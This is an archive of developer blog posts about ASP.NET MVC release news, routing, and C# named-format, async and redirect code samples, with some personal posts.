asp.net mvc, asp.net comments edit

At long last I am happy, relieved, excited to announce the release candidate for ASP.NET MVC. Feel free to go download it now. I’ll wait right here patiently.

There have been a lot of improvements made since the Beta release so be sure to read the release notes. I’ve tried very hard to be thorough in the notes so do let me know if anything is lacking. We are also pushing new tutorials up to the ASP.NET MVC Website as I write this.

Also, don’t miss ScottGu’s usual epic blog post describing the many improvements. There’s also a post on the Web Tools team blog covering tooling aspects of this release in detail. As I mentioned when we released the Beta, we didn’t have plans for many new features in the runtime, but we did have a lot of tooling improvements to add. I’ve already described some of these changes in a previous blog post, as did ScottGu in his detailed look.

Our goal with this release was to fix all outstanding bugs which we felt were real showstoppers and try to address specific customer concerns. We worked hard to add a bit of spit and polish to this release.

Unfortunately, a few minor bugs did crop up at the last second, but we decided we could continue with this RC and fix the bugs afterwards as the impact appear to be relatively small and they all have workarounds. I wrote about one particular bug so that you’re aware of it.

For now, I want to share a few highlights. This is not an exhaustive list at all. For that, check out Scott’s post and the release notes.

Ajax

Yes, I do know that jQuery released a new version (1.3.1), and no, it is not in this release. :) We just didn’t have time to include it due to the timing of its release. However, we are performing due diligence right now and plan to include it with the RTM.

We did make some changes to our Ajax helpers to recognize the standard X-Requested-With HTTP header used by the major JavaScript libraries such as Prototype.js, jQuery, and Dojo. Thus the IsMvcAjaxRequest method was renamed to IsAjaxRequest and looks for this header rather than our custom one.

ControllerContext

ControllerContext no longer inherits from RequestContext, which will improve testing and extensibility scenarios. We would have liked to make changes to RequestContext, but it was introduced as part of the .NET Framework in ASP.NET 3.5 SP1. Thus we can’t change it in our out-of-band release.

Anti Forgery Helpers

These helpers were previously released in our “futures” assembly, but we’ve fixed a few bugs and moved them into the core ASP.NET MVC assembly.

These are helpers which help mitigate Cross-Site Request Forgery (CSRF) attacks. For a great description of these helpers, check out Steve Sanderson’s blog post on the topic.

MVC Futures

I added a couple of expression based helpers to the ASP.NET MVC futures assembly, Microsoft.Web.Mvc.dll. These are just samples to demonstrate how one could write such helpers. I’ll add a few more by the time we ship the RTM. Note, if you’re using the old futures assembly, it won’t work with the new RC. You’ll need to update to the new Futures assembly.

In case you missed it the first time,click here for the Download.

asp.net comments edit

A while back on a lark, I posted a prototype demonstrating how one could use Routing within Web Forms. This is something you can do today with ASP.NET 3.5 SP1, because of the work we did to separate Routing from ASP.NET MVC. I would have liked to include Web Form Routing as part of the Routing feature when we were working on SP1, but we didn’t have the time to do so in a robust manner before SP1 was locked down.

Since then, Scott Galloway, who just happens to be my office mate, has taken the reigns and is the PM in change of guiding the Web Form Routing feature to be included in ASP.NET 4.0 in a more integrated fashion.

He wrote a blog post earlier today describing some of the ways that routing will be more deeply integrated into ASP.NET such as new properties of the Page class, cool uses of Expression Builders, etc… That’s just a teaser as he promises to go a little more in depth soon.

Technorati Tags: Routing,ASP.NET

code comments edit

UPDATE: Be sure to read Peli’s post in which he explores all of these implementations using PEX. Apparently I have a lot more unit tests to write in order to define the expected behavior of the code.

I recently wrote a post in which I examined some existing implementations of named format methods and then described the fun I had writing a routine for implementing named formats.

In response to that post, I received two new implementations of the method that are worth calling out.

The first was sent to me by Atif Aziz, who I’ve corresponded with via email regarding Jayrock. He noticed that the slowest format method by James had one obvious performance flaw and fixed it up. He then sent me another version that passed all my unit tests. Here it is in full, and it’s much faster than before.

public static class JamesFormatter
{
  public static string JamesFormat(this string format, object source)
  {
    return FormatWith(format, null, source);
  }

  public static string FormatWith(this string format
      , IFormatProvider provider, object source)
  {
    if (format == null)
      throw new ArgumentNullException("format");

    List<object> values = new List<object>();
    string rewrittenFormat = Regex.Replace(format,
      @"(?<start>\{)+(?<property>[\w\.\[\]]+)(?<format>:[^}]+)?(?<end>\})+",
      delegate(Match m)
      {
        Group startGroup = m.Groups["start"];
        Group propertyGroup = m.Groups["property"];
        Group formatGroup = m.Groups["format"];
        Group endGroup = m.Groups["end"];

        values.Add((propertyGroup.Value == "0")
          ? source
          : Eval(source, propertyGroup.Value));

        int openings = startGroup.Captures.Count;
        int closings = endGroup.Captures.Count;

        return openings > closings || openings % 2 == 0
           ? m.Value
           : new string('{', openings) + (values.Count - 1) 
             + formatGroup.Value
             + new string('}', closings);
      },
      RegexOptions.Compiled 
      | RegexOptions.CultureInvariant 
      | RegexOptions.IgnoreCase);

    return string.Format(provider, rewrittenFormat, values.ToArray());
  }

  private static object Eval(object source, string expression)
  {
    try
    {
      return DataBinder.Eval(source, expression);
    }
    catch (HttpException e)
    {
      throw new FormatException(null, e);
    }
  }
}

The other version I got was from another Microsoftie named Henri Wiechers (no blog) who pointed out that a state machine of the sort that a parser or scanner would use, is well suited for this task. It also makes the code easier to understand if you’re accustomed to state machines.

public static class HenriFormatter
{
  private static string OutExpression(object source, string expression)
  {
    string format = "";

    int colonIndex = expression.IndexOf(':');
    if (colonIndex > 0)
    {
      format = expression.Substring(colonIndex + 1);
      expression = expression.Substring(0, colonIndex);
    }

    try
    {
      if (String.IsNullOrEmpty(format))
      {
        return (DataBinder.Eval(source, expression) ?? "").ToString();
      }
      return DataBinder.Eval(source, expression, "{0:" + format + "}") 
          ?? "";
    }
    catch (HttpException)
    {
      throw new FormatException();
    }
  }

  public static string HenriFormat(this string format, object source)
  {
    if (format == null)
    {
      throw new ArgumentNullException("format");
    }

    StringBuilder result = new StringBuilder(format.Length * 2);      

    using (var reader = new StringReader(format))
    {
      StringBuilder expression = new StringBuilder();
      int @char = -1;

      State state = State.OutsideExpression;
      do
      {
        switch (state)
        {
          case State.OutsideExpression:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                state = State.End;
                break;
              case '{':
                state = State.OnOpenBracket;
                break;
              case '}':
                state = State.OnCloseBracket;
                break;
              default:
                result.Append((char)@char);
                break;
            }
            break;
          case State.OnOpenBracket:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                throw new FormatException();
              case '{':
                result.Append('{');
                state = State.OutsideExpression;
                break;
              default:
                expression.Append((char)@char);
                state = State.InsideExpression;
                break;
            }
            break;
          case State.InsideExpression:
            @char = reader.Read();
            switch (@char)
            {
              case -1:
                throw new FormatException();
              case '}':
                result.Append(OutExpression(source, expression.ToString()));
                expression.Length = 0;
                state = State.OutsideExpression;
                break;
              default:
                expression.Append((char)@char);
                break;
            }
            break;
          case State.OnCloseBracket:
            @char = reader.Read();
            switch (@char)
            {
              case '}':
                result.Append('}');
                state = State.OutsideExpression;
                break;
              default:
                throw new FormatException();
            }
            break;
          default:
            throw new InvalidOperationException("Invalid state.");
        }
      } while (state != State.End);
    }

    return result.ToString();
  }

  private enum State
  {
    OutsideExpression,
    OnOpenBracket,
    InsideExpression,
    OnCloseBracket,
    End
  }
}

As before, I wanted to emphasize that this was not a performance contest. I was interested in correctness with reasonable performance.

Now that the JamesFormatter is up to speed, I was able to crank up the number of iterations to 50,000 without testing my patience and tried it again. I also made the format string slightly longer. Here are the new results.

named format perf take
2As you can see, they are all very close, though Henri’s method is the fastest.

I went ahead and updated the solution I had uploaded last time so you can try it yourself by downloading it now.

Tags: format strings , named formats

code comments edit

I’ve been having trouble getting to sleep lately, so I thought last night that I would put that to use and hack on Subtext a bit. While doing so, I ran into an old Asynchronous Fire and Forget helper method written way back by Mike Woodring which allows you to easily call a delegate asynchronously.

On the face of it, it seems like you could simply call BeginInvoke on the delegate and be done with it, Mike’s code addresses a concern with that approach:

Starting with the 1.1 release of the .NET Framework, the SDK docs now carry a caution that mandates calling EndInvoke on delegates you’ve called BeginInvoke on in order to avoid potential leaks. This means you cannot simply “fire-and-forget” a call to BeginInvoke without the risk of running the risk of causing problems.

The mandate he’s referring to, I believe, is this clause in the MSDN docs:

No matter which technique you use, always call EndInvoke to complete your asynchronous call.

Note that it doesn’t explicitly say “or you will get a memory leak”. But a little digging turns up the following comment in the MSDN forums.

The reason that you should call EndInvoke is because the results of the invocation (even if there is no return value) must be cached by .NET until EndInvoke is called.  For example if the invoked code throws an exception then the exception is cached in the invocation data.  Until you call EndInvoke it remains in memory.  After you call EndInvoke the memory can be released.  For this particular case it is possible the memory will remain until the process shuts down because the data is maintained internally by the invocation code.  I guess the GC might eventually collect it but I don’t know how the GC would know that you have abandoned the data vs. just taking a really long time to retrieve it.  I doubt it does.  Hence a memory leak can occur.

The thread continues to have some back and forth and doesn’t appear to be conclusive either way, but this post by Don Box gives a very pragmatic argument.

…the reality is that some implementations rely on the EndXXX call to clean up resources.  Sometimes you can get away with it, but in the general case you can’t.

In other words, why take the chance? In any case, much of this discussion is made redundant with the C# 3.0 Action class combined with ThreadPool.QueueUserWorkItem aka (QUWI)

Here is the code in Subtext for sending email, more or less. I have to define a delegate and then pass that to FireAndForget

// declaration
delegate bool SendEmailDelegate(string to, 
      string from, 
      string subject, 
      string body);

//... in a method body
SendEmailDelegate sendEmail = im.Send;
AsyncHelper.FireAndForget(sendEmail, to, from, subject, body);

This code relies on the FireAndForget method which I show here. Note I am not showing the full code. I just wanted to point out that the arguments to the delegate are not strongly typed. They are simply an array of objects which provide no guidance to how many arguments you need to pass.

public static void FireAndForget(Delegate d, params object[] args)
{
  ThreadPool.QueueUserWorkItem(dynamicInvokeShim, 
    new TargetInfo(d, args));
}

Also notice that this implementation uses QUWI under the hood.

With C# 3.0, there is no need to abstract away the call to QUWI. Just pass in a lambda, which provides the benefit that you’re calling the actual method directly so you get Intellisense for the argumennts etc… So all that code gets replaced with:

ThreadPool.QueueUserWorkItem(callback => im.Send(to, from, subject, body));

Much cleaner and I get to get rid of more code! As I’ve said before, the only thing better than writing code is getting rid of code!

asp.net, asp.net mvc comments edit

Rob pinged me today asking about how to respond to requests using different formats based on the extension in the URL. More specifically, he’d like to respond with HTML if there is no file extension, but with JSON if the URL ended with .json etc…

/home/index –> HTML

/home/index.json –> JSON

The first thing I wanted to tackle was writing a custom action invoker that would decide based on what’s in the route data, how to format the response.

This would allow the developer to simply return an object (the model) from an action method and the invoker would look for the format in the route data and figure out what format to send.

So I wrote a custom action invoker:

public class FormatHandlingActionInvoker : ControllerActionInvoker {
  protected override ActionResult CreateActionResult(
      ControllerContext controllerContext, 
      ActionDescriptor actionDescriptor, 
      object actionReturnValue) {
    if (actionReturnValue == null) {
      return new EmptyResult();
    }

    ActionResult actionResult = actionReturnValue as ActionResult;
    if (actionResult != null) {
      return actionResult;
    }

    string format = (controllerContext.RouteData.Values["format"] 
        ?? "") as string;
      switch (format) {
        case "":
        case "html":
          var result = new ViewResult { 
            ViewData = controllerContext.Controller.ViewData, 
            ViewName = actionDescriptor.ActionName 
          };
          result.ViewData.Model = actionReturnValue;
          return result;
          
        case "rss":
          //TODO: RSS Result
          break;
        case "json":
          return new JsonResult { Data = actionReturnValue };
    }

    return new ContentResult { 
      Content = Convert.ToString(actionReturnValue, 
       CultureInfo.InvariantCulture) 
    };
  }
}

The key thing to note is that I overrode the method CreateActionResult. This method is responsible for examining the result returned from an action method (which can be any type) and figuring out what to do with it. In this case, if the result is already an ActionResult, we just use it. However, if it’s something else, we look at the format in the route data to figure out what to return.

For reference, here’s the code for the HomeController which simply returns an object.

[HandleError]
public class HomeController : Controller {
  public object Index() {
    return new {Title = "HomePage", Message = "Welcome to ASP.NET MVC" };
  }
}

In order to make sure that all my controllers replaced the default invoker with this invoker, I wrote a controller factory that would set this invoker. I won’t show the code here, but I will include it in the download.

So at this point, we have everything in place, except for the fact that I haven’t dealt with how we get the format in the route data in the first place. Unfortunately, it ends up that this isn’t quite so straightforward. Consider the default route:

routes.MapRoute(
    "Default",
    "{controller}/{action}/{id}",
    new { controller = "Home", action = "Index", id = "" }
);

Since this route allows for default values at each segment, this single route matches all the following URLs:

  • /home/index/123
  • /home/index
  • /home

So the question becomes, if we want to support optional format extensions in the URL, would we have to support it for every segment? Making up a fictional syntax, maybe it would look like this:

routes.MapRoute(
    "Default",
    "{controller{.format}}/{action{.format}}/{id{.format}}",
    new { controller = "Home", action = "Index", id = "", format = ""}
);

Where the {.format} part would be optional. Of course, we don’t have such a syntax available, so I needed to put on my dirty ugly hacking hat and see what I could come up with. I decided to do something we strongly warn people not to do, inheriting HttpRequestWrapper with my own HttpRequestBase implementation and stripping off the extension before I try and match the routes.

Warning! Don’t do this at home! This is merely experimentation while I mull over a better approach. This approach relies on implementation details I should not be relying upon

public class HttpRequestWithFormat : HttpRequestWrapper
{
  public HttpRequestWithFormat(HttpRequest request) : base(request) { 
  }

  public override string AppRelativeCurrentExecutionFilePath {
    get
    {
      string filePath = base.AppRelativeCurrentExecutionFilePath;
      string extension = System.IO.Path.GetExtension(filePath);
      if (String.IsNullOrEmpty(extension)) {
        return filePath;
      }
      else {
        Format = extension.Substring(1);
        filePath = filePath.Substring(0, filePath.LastIndexOf(extension));
      }
      return filePath;
    }
  }

  public string Format {
    get;
    private set;
  }
}

I also had to write a custom route.

public class FormatRoute : Route
{
  public FormatRoute(Route route) : 
    base(route.Url + ".{format}", route.RouteHandler) {
    _originalRoute = route;
  }

  public override RouteData GetRouteData(HttpContextBase httpContext)
  {
    //HACK! 
    var context = new HttpContextWithFormat(HttpContext.Current);

    var routeData = _originalRoute.GetRouteData(context);
    var request = context.Request as HttpRequestWithFormat;
    if (!string.IsNullOrEmpty(request.Format)) {
      routeData.Values.Add("format", request.Format);
    }

    return routeData;
  }

  public override VirtualPathData GetVirtualPath(
    RequestContext requestContext, RouteValueDictionary values)
  {
    var vpd = base.GetVirtualPath(requestContext, values);
    if (vpd == null) {
      return _originalRoute.GetVirtualPath(requestContext, values);
    }
    
    // Hack! Let's fix up the URL. Since "id" can be empty string,  
    // we want to check for this condition.
    string format = values["format"] as string;
    string funkyEnding = "/." + format as string;
    
    if (vpd.VirtualPath.EndsWith(funkyEnding)) { 
      string virtualPath = vpd.VirtualPath;
      int lastIndex = virtualPath.LastIndexOf(funkyEnding);
      virtualPath = virtualPath.Substring(0, lastIndex) + "." + format;
      vpd.VirtualPath = virtualPath;
    }

    return vpd;
  }

  private Route _originalRoute;
}

When matching incoming requests, this route replaces the HttpContextBase with my faked up one before calling GetRouteData. My faked up context returns a faked up request which strips the format extension from the URL.

Also, when generating URLs, this route deals with the cosmetic issue that the last segment of the URL has a default value of empty string. This makes it so that the URL might end up looking like /home/index/.jsonwhen I really wanted it to look like /home/index.json.

I’ve omitted some code from this blog post, but you can download the project here and try it out. Just navigate to /home/index and then try /home/index.json and you should notice the response format changes.

This is just experimental work. There’d be much more to do to make this useful. For example, would be nice if an action could specify which formats it would respond to. Likewise, it might be nice to respond based on accept headers rather than formats. I just wanted to see how automatic I could make it.

In any case, I was just having fun and didn’t have much time to put this together. The takeaway from this is really the CreateActionResult method of ControllerActionInvoker. That makes it very easy to create interesting default behavior so that your action methods can return whatever they want and you can implement your own conventions by overriding that method.

Download the hacky experiment here**and play with it at your own risk. :)

code, format comments edit

TRIPLE UPDATE! C# now has string interpolation which pretty much makes this post unnecessary and only interesting as a fun coding exercise.

DOUBLE UPDATE! Be sure to read Peli’s post in which he explores all of these implementations using PEX. Apparently I have a lot more unit tests to write in order to define the expected behavior of the code.

UPDATE: By the way, after you read this post, check out the post in which I revisit this topic and add two more implementations to check out.

Recently I found myself in a situation where I wanted to format a string using a named format string, rather than a positional one. Ignore for the moment the issue on whether this is a good idea or not, just trust me that I’ll be responsible with it.

The existing String.Format method, for example, formats values according to position.

string s = string.Format("{0} first, {1} second", 3.14, DateTime.Now);

But what I wanted was to be able to use the name of properties/fields, rather than position like so:

var someObj = new {pi = 3.14, date = DateTime.Now};
string s = NamedFormat("{pi} first, {date} second", someObj);

Looking around the internet, I quickly found three implementations mentioned in this StackOverflow question.

All three implementations are fairly similar in that they all use regular expressions for the parsing. Hanselman’s approach is to write an extension method of object (note that this won’t work in VB.NET until they allow extending object). James and Oskar wrote extension methods of the string class. James takes it a bit further by using DataBinder.Eval on each token, which allows you to have formats such as {foo.bar.baz} where baz is a property of bar which is a property of foo. This is something else I wanted, which the others do not provide.

He also makes good use of the MatchEvaluator delegate argument to the Regex.Replace method, perhaps one of the most underused yet powerful features of the Regex class. This ends up making the code for his method very succinct.

Handling Brace Escaping

I hade a chat about this sort of string parsing with Eilon recently and he mentioned that many developers tend to ignore or get escaping wrong. So I thought I would see how these methods handle a simple test of escaping the braces.

String.Format with the following:

Console.WriteLine(String.Format("{{{0}}}", 123));

produces the output (sans quotes) of “{123}”

So I would expect with each of these methods, that:

Console.WriteLine(NamedFormat("{{{foo}}}", new {foo = 123}));

Would produce the exact same output, “{123}”. However, only James’s method passed this test. But when I expanded the test to the following format, “{{{{{foo}}}}}”, all three failed. That should have produced “{{123}}”.

Certainly this is not such a big deal as this really is an edge case, but you never know when an edge case might bite you as Zune owners learned recently. More importantly, it poses an interesting problem - how do you handle this correctly? I thought it would be fun to try.

This is possible to handle correctly using regular expressions, but it’s challenging. Not only are you dealing with balanced matching, but the matching depends on whether the number of consecutive braces are odd or even.

For example, the following “{0}}” is not valid because the right end brace is escaped. However, “{0}}}” is valid. The expression is closed with the leftmost end brace, which is followed by an even number of consecutive braces, which means they are all escaped sequences.

Performance

As I mentioned earlier, only James’s method handles evaluation of sub-properties/fields via the use of the DataBinder.Eval method. Critics of his blog post point out that this is a performance killer.

Personally, until I’ve measured it in the scenarios in which I plan to use it, I doubt that the performance will really be an issue compared to everything else going on. But I thought I would check it out anyways, writing a simple console app which runs each method over 1000 iterations, and then divides by 1000 to get the number of milliseconds each method takes. Here’s the result:

format
perf

Notice that James’s method is 43 times slower than Hanselman’s. Even so, it only takes 4.4 milliseconds. So if you don’t use it in a tight loop with a lot of iterations, it’s not horrible, but it could be better.

My Implementation

At this point, I thought it would be fun to write my own implementation using manual string parsing rather than regular expressions. I’m not sure my regex-fu is capable of handling the challenges I mentioned before. After implementing my own version, I ran the performance test and saw the following result.

haackformat
perf

Nice! by removing the overhead of using a regular expression in this particular case, my implementation is faster than the other implementations, despite my use of DataBinder.Eval. Hopefully my implementation is correct, because fast and wrong is even worse than slow and right.

One drawback to not using regular expressions is that the code for my implementation is a bit long. I include the entire source here. I’ve also zipped up the code for this solution which includes unit tests as well as the implementations of the other methods I tested, so you can see which tests they pass and which they don’t pass.

The core of the code is in two parts. One is a private method which parses and splits the string into an enumeration of segments represented by the ITextExpression interface. The method you call joins these segments together, evaluating any expressions against a supplied object, and returning the resulting string.

I think we could optimize the code even more by joining these operations into a single method, but I really liked the separation between the parsing and joining logic as it helped me wrap my head around it. Initially, I hoped that I could cache the parsed representation of the format string since strings are immutable thus I could re-use it. But it didn’t end up giving me any real performance gain when I measured it.

public static class HaackFormatter
{
  public static string HaackFormat(this string format, object source)
  {

    if (format == null) {
        throw new ArgumentNullException("format");
    }

    var formattedStrings = (from expression in SplitFormat(format)
                 select expression.Eval(source)).ToArray();
    return String.Join("", formattedStrings);
  }

  private static IEnumerable<ITextExpression> SplitFormat(string format)
  {
    int exprEndIndex = -1;
    int expStartIndex;

    do
    {
      expStartIndex = format.IndexOfExpressionStart(exprEndIndex + 1);
      if (expStartIndex < 0)
      {
        //everything after last end brace index.
        if (exprEndIndex + 1 < format.Length)
        {
          yield return new LiteralFormat(
              format.Substring(exprEndIndex + 1));
        }
        break;
      }

      if (expStartIndex - exprEndIndex - 1 > 0)
      {
        //everything up to next start brace index
        yield return new LiteralFormat(format.Substring(exprEndIndex + 1
          , expStartIndex - exprEndIndex - 1));
      }

      int endBraceIndex = format.IndexOfExpressionEnd(expStartIndex + 1);
      if (endBraceIndex < 0)
      {
        //rest of string, no end brace (could be invalid expression)
        yield return new FormatExpression(format.Substring(expStartIndex));
      }
      else
      {
        exprEndIndex = endBraceIndex;
        //everything from start to end brace.
        yield return new FormatExpression(format.Substring(expStartIndex
          , endBraceIndex - expStartIndex + 1));

      }
    } while (expStartIndex > -1);
  }

  static int IndexOfExpressionStart(this string format, int startIndex) {
    int index = format.IndexOf('{', startIndex);
    if (index == -1) {
      return index;
    }

    //peek ahead.
    if (index + 1 < format.Length) {
      char nextChar = format[index + 1];
      if (nextChar == '{') {
        return IndexOfExpressionStart(format, index + 2);
      }
    }

    return index;
  }

  static int IndexOfExpressionEnd(this string format, int startIndex)
  {
    int endBraceIndex = format.IndexOf('}', startIndex);
    if (endBraceIndex == -1) {
      return endBraceIndex;
    }
    //start peeking ahead until there are no more braces...
    // }}}}
    int braceCount = 0;
    for (int i = endBraceIndex + 1; i < format.Length; i++) {
      if (format[i] == '}') {
        braceCount++;
      }
      else {
        break;
      }
    }
    if (braceCount % 2 == 1) {
      return IndexOfExpressionEnd(format, endBraceIndex + braceCount + 1);
    }

    return endBraceIndex;
  }
}

And the code for the supporting classes

public class FormatExpression : ITextExpression
{
  bool _invalidExpression = false;

  public FormatExpression(string expression) {
    if (!expression.StartsWith("{") || !expression.EndsWith("}")) {
      _invalidExpression = true;
      Expression = expression;
      return;
    }

    string expressionWithoutBraces = expression.Substring(1
        , expression.Length - 2);
    int colonIndex = expressionWithoutBraces.IndexOf(':');
    if (colonIndex < 0) {
      Expression = expressionWithoutBraces;
    }
    else {
      Expression = expressionWithoutBraces.Substring(0, colonIndex);
      Format = expressionWithoutBraces.Substring(colonIndex + 1);
    }
  }

  public string Expression { 
    get; 
    private set; 
  }

  public string Format
  {
    get;
    private set;
  }

  public string Eval(object o) {
    if (_invalidExpression) {
      throw new FormatException("Invalid expression");
    }
    try
    {
      if (String.IsNullOrEmpty(Format))
      {
        return (DataBinder.Eval(o, Expression) ?? string.Empty).ToString();
      }
      return (DataBinder.Eval(o, Expression, "{0:" + Format + "}") ?? 
        string.Empty).ToString();
    }
    catch (ArgumentException) {
      throw new FormatException();
    }
    catch (HttpException) {
      throw new FormatException();
    }
  }
}

public class LiteralFormat : ITextExpression
{
  public LiteralFormat(string literalText) {
    LiteralText = literalText;
  }

  public string LiteralText { 
    get; 
    private set; 
  }

  public string Eval(object o) {
    string literalText = LiteralText
        .Replace("{{", "{")
        .Replace("}}", "}");
    return literalText;
  }
}

I mainly did this for fun, though I plan to use this method in Subtext for email fomatting.

Let me know if you find any situations or edge cases in which my version fails. I’ll probably be adding more test cases as I integrate this into Subtext. As far as I can tell, it handles normal formatting and brace escaping correctly.

personal comments edit

At the end of the year, it’s very common for bloggers to take a look back at their own blog and list their favorite 10 blog posts. I find that somewhat narcissistic, so you know I’m going to do that.

But before I do, I thought it would be great to list the top 10 blog posts by others I read in 2008. The only problem is, I have very bad short-term memory and I can’t seem to remember which ones I read that had a real impact on my thinking. I’ll have to try and keep better track in 2009.

So based on a cursory Google search and look through my Google Reader app, here are some of my favorite blog posts of 2008 by you all, I couldn’t even list 10. Please do comment with your own favorite blog posts, mine or otherwise of 2008.

Favorite Posts I Read

My Top Posts (Using the Ayende Formula)

A while back, Ayende wrote up a weighted query for Subtext to determine the top posts. I updated it to only include mine published in

  1. Here are the top 5.

Milestones Moments

There are some posts that I personally liked because they represent important events that happened to me in 2008.

Ok, so maybe this post is pretty typical and doesn’t live up to the title I gave it. Oh well, I tried.

I’m sure I’m forgetting a whole lot of other important events that happened in 2008. I’m probably neglecting great blog posts that I read. But that’s the great thing about a blog, I’m confident people will point out my shortcomings in the comments to this post, and for that, I’m grateful. You all rock!

And with that, I leave you with this moment of zen, a photo taken near my house.

giant
snowman

asp.net, asp.net mvc comments edit

Dmitry, who’s the PUM for ASP.NET, recently wrote a blog post about an interesting approach he took using VB.NET XML Literals as a view engine for ASP.NET MVC.

Now before you VB haters dismiss this blog post and leave, bear with me for just a second. Dmitry and I had a conversation one day and he noted that there are a lot of similarities between our view engine hierarchy and and normal class hierarchies.

For example, a master page is not unlike a base class. Content placeholders within a master page are similar to abstract methods. Content placeholders with default content are like virtual methods. And so on…

So he thought it would be interesting to have a class be a view rather than a template file, and put together this VB demo. One thing he left out is what the view class actually looks like in Visual Studio, which I think is kinda cool (click on image for larger view).

VB.NET XML Literal
View

Notice that this looks pretty similar to what you get in the default Index.aspx view. One advantage of this approach is that you’re always using VB rather than switching over to writing markup. So if you forget to close a tag, for example, you get immediate compilation errors.

Another advantage is that your “view” is now compiled into the same assembly as the rest of your code. Of course, this could also be a disadvantage depending how you look at it.

code comments edit

I was reading Jeff Atwood’s latest post, Programming: Love it or Leave it when I came across this part, emphasis mine.

Joel implied that good programmers love programming so much they’d do it for no pay at all. I won’t go quite that far, but I will note that the best programmers I’ve known have all had a lifelong passion for what they do. There’s no way a minor economic blip would ever convince them they should do anything else. No way. No how.

Unlike Jeff, I will go that far. I love to code, and I do it for free all the time.

I don’t think Joel meant to imply that programmers would continue to write code for their current employers for free in lieu of any pay. What I think he meant was that programmers who love to code will code for fun as well as profit. They’ll write code outside of their paying jobs.

For example, I took the entire week off last week and spent lots of time with my family, which was wonderful (cue gratuitous picture of kid)! I trained my son in Ninja acrobatics.

cody ninja
acrobatics 

I got my brother completely hooked on Desktop Tower Defense.

brian playing desktop tower
defense

And tried to figure out what sort of mischief my son was involved in, as that face is as guilty as sin.

mischief

However, along with all that family fun, I spent nearly every minute of downtime hacking on Subtext. I went on a huge refactoring binge cleaning up stale code, separating concerns left and right, and replacing the old method of matching requests with ASP.NET Routing.

And it was huge fun!

And I’m not alone. I noticed several streams on Twitter of folks having fun writing code, such as Glenn Block sharing his learning in the open experiences, among others.

Developers I’ve worked with who really love to code, tend to do it for fun, as well as for work. Personally, I don’t think it’s unhealthy as long as it’s not the only thing you do for fun. And I’m not suggesting that if you don’t do it for fun, you don’t love to code. Some people work so much, they don’t have time to do it for fun, but would code for fun if they had copious free time.

As for me, I’ll say it again, I <3 to code.

asp.net, asp.net mvc comments edit

A while ago ScottGu mentioned in his blog that we would try and have an ASP.NET MVC Release Candidate by the end of this year. My team worked very hard at it, but due to various unforeseeable circumstances, I’m afraid that’s not gonna happen. Heck, I couldn’t even get into the office yesterday because the massive dumping of snow. I hope to get in today a little later since I’m taking next week off to be with my family coming in from Alaska.

But do not fret, we’ll have something early next year to release. In the meanwhile, we gave some rough bits to Scott Guthrie to play with and he did not disappoint yet again with a a great detailed post on some upcoming new features both in the runtime and in tooling.

look-ma-no-code-behind Often, it’s the little touches that get me excited, and I want to call one of those out, Views without Code-Behind. This was always possible, of course, but due to some incredible hacking down in the plumbings of ASP.NET , David Ebbo with some assistance from Eilon Lipton, figured out how to get it to work with generic types using your language specific syntax for generic types. If you recall, previously it required using that complex CLR Syntax within the Inherits attribute.

Keep in mind that they had to do this without touching the core ASP.NET bits since ASP.NET MVC is a bin-deployable out-of-band release. David provided some hints on how they did this within his blog in these two posts: ProcessGeneratedCode: A hidden gem for Control Builder writers and Creating a ControlBuilder for the page itself.

 

In the meanwhile, Stephen Walther has been busy putting together a fun new section of the ASP.NET MVC website called the ASP.NET MVC Design Gallery.

In one of my talks about ASP.NET MVC, I mentioned a site that went live with our default drab blue project template (the site has since redesigned its look entirely). The Design Gallery provides a place for the community to upload alternative designs for our default template.

Happy Holidays

Cody Again, I apologize that we don’t have updated bits for you to play with, but we’ll have something next year! In the meanwhile, as the end of this year winds down, I hope it was a good one for you. It certainly was a good one for me. Enjoy your holidays, have a Merry Christmas, Hannukah, Kwanza, Winter Solstice, Over Consumption Day, whatever it is you celebrate or don’t celebrate. ;)

asp.net mvc, asp.net comments edit

ASP.NET Routing is useful in many situations beyond ASP.NET MVC. For example, I often need to run a tiny bit of custom code in response to a specific request URL. Let’s look at how routing can help.

First, let’s do a quick review. When you define a route, you specify an instance of IRouteHandler associated with the route which is given a chance to figure out what to do when that route matches the request. This step is typically hidden from most developers who use the various extension methods such as MapRoute.

Once the route handler makes that decision, it returns an instance of IHttpHandler which ultimately processes the request.

There are many situations in which I just have a tiny bit of code I want to run and I’d rather not have to create both a custom route handler and http handler class.

So I started experimenting with some base handlers that would allow me to pass around delegates.

Warning: the code you are about to see may cause permanent blindness. This was done for fun and I’m not advocating you use the code as-is.

It works, but the readability of all these lambda expressions may cause confusion and insanity.

One common case I need to handle is permanently redirecting a set of URLs to another set of URLs. I wrote a simple extension method of RouteCollection to do just that. In my Global.asax.cs file I can write this:

routes.RedirectPermanently("home/{foo}.aspx", "~/home/{foo}");

This will permanently redirect all requests within the home directory containing the .aspx extension to the same URL without the extension. That’ll come in pretty handy for my blog in the future.

When you define a route, you have to specify an instance of IRouteHandler which handles matching requests. That instance in turn returns an IHttpHandler which ultimately handles the request. Let’s look at the simple implementation of this RedirectPermanently method.

public static Route RedirectPermanently(this RouteCollection routes, 
    string url, string targetUrl) {
  Route route = new Route(url, new RedirectRouteHandler(targetUrl, true));
  routes.Add(route);
  return route;
}

Notice that we simply create a route using the RedirectRouteHandler. As we’ll see, I didn’t even need to do this, but it helped make the code a bit more readable. To make heads or tails of this, we need to look at that handler. Warning: Some funky looking code ahead!

public class RedirectRouteHandler : DelegateRouteHandler {
  public RedirectRouteHandler(string targetUrl) : this(targetUrl, false) { 
  }

  public RedirectRouteHandler(string targetUrl, bool permanently)
    : base(requestContext => {
      if (targetUrl.StartsWith("~/")) {
        string virtualPath = targetUrl.Substring(2);
        Route route = new Route(virtualPath, null);
        var vpd = route.GetVirtualPath(requestContext, 
          requestContext.RouteData.Values);
        if (vpd != null) {
          targetUrl = "~/" + vpd.VirtualPath;
        }
      }
      return new DelegateHttpHandler(httpContext => 
        Redirect(httpContext, targetUrl, permanently), false);
    }) {
    TargetUrl = targetUrl;
  }

  private void Redirect(HttpContext context, string url, bool permanent) {
    if (permanent) {
      context.Response.Status = "301 Moved Permanently";
      context.Response.StatusCode = 301;
      context.Response.AddHeader("Location", url);
    }
    else {
      context.Response.Redirect(url, false);
    }
  }

  public string TargetUrl { get; private set; }
}

I bolded a portion of the code within the constructor. The bolded portion is a delegate (via a lambda expression) being passed to the base constructor. Rather than creating a custom IHttpHandler class, I am telling the base class what code I would want that http handler (if I had written one) to execute in order to process the request. I pass that code as a lambda expression to the base class.

